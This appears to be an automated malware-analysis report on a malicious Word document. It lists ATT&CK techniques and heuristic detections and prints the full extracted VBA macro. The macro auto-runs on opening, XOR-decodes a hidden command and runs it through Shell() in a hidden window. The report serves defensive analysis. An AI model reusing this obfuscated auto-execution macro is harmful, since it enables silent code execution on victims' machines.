MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample contains a VBA macro that is automatically executed upon opening the document. This macro utilizes the Shell() function to execute a deobfuscated command, which is likely a second-stage payload. The deobfuscated command is constructed by XORing an array of integers with a key derived from document variables, resulting in the execution of an external process.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1565 bytes |
SHA-256: a1df33e2d30340f4a7ad994ed32978428d056d2e8b39d699f15a6cb71848a1f4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If ActiveDocument.Variables("wYmdIG").Value <> "toto" Then
DdvoqmBPRv
ActiveDocument.Variables("wYmdIG").Value = "toto"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub
Attribute VB_Name = "XKXSCiJ"
Private Function TTodQNRDxC(FCYyMCLAff As Variant, UwaDuZjwQY As Integer)
Dim TszWehbFFL, EaDLfqaOZz As String, mRkCLAVTkW, zPpIPKCPru
EaDLfqaOZz = ActiveDocument.Variables("wYmdIG").Value()
TszWehbFFL = ""
mRkCLAVTkW = 1
While mRkCLAVTkW < UBound(FCYyMCLAff) + 2
zPpIPKCPru = mRkCLAVTkW Mod Len(EaDLfqaOZz): If zPpIPKCPru = 0 Then zPpIPKCPru = Len(EaDLfqaOZz)
TszWehbFFL = TszWehbFFL + Chr(Asc(Mid(EaDLfqaOZz, zPpIPKCPru + UwaDuZjwQY, 1)) Xor CInt(FCYyMCLAff(mRkCLAVTkW - 1)))
mRkCLAVTkW = mRkCLAVTkW + 1
Wend
TTodQNRDxC = TszWehbFFL
End Function
Public Function DdvoqmBPRv() As Variant
Dim JXv As String
JXv = TTodQNRDxC(Array(4, 79, 55, 56, 36, 43, 80, 37, 38, 33, 11, 38, 1, 57, 62, 50, 44, 88, 84, 57, 30, _
74, 47, 28, 83, 104, 28, 60, 80, 74, 38, 71, 58, 34, 9, 108, 74, 90, 3, 58, 70, _
28, 30, 24, 28, 61, 28, 59, 29, 56, 8, 18, 66, 15, 37, 91, 17, 38, 18, 18, 94, _
3, 63, 53, 106, 4, 80, 80, 90, 90, 61, 27, 54, 5, 23), 0)
Dim RetVal
RetVal = Shell(JXv, 0)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.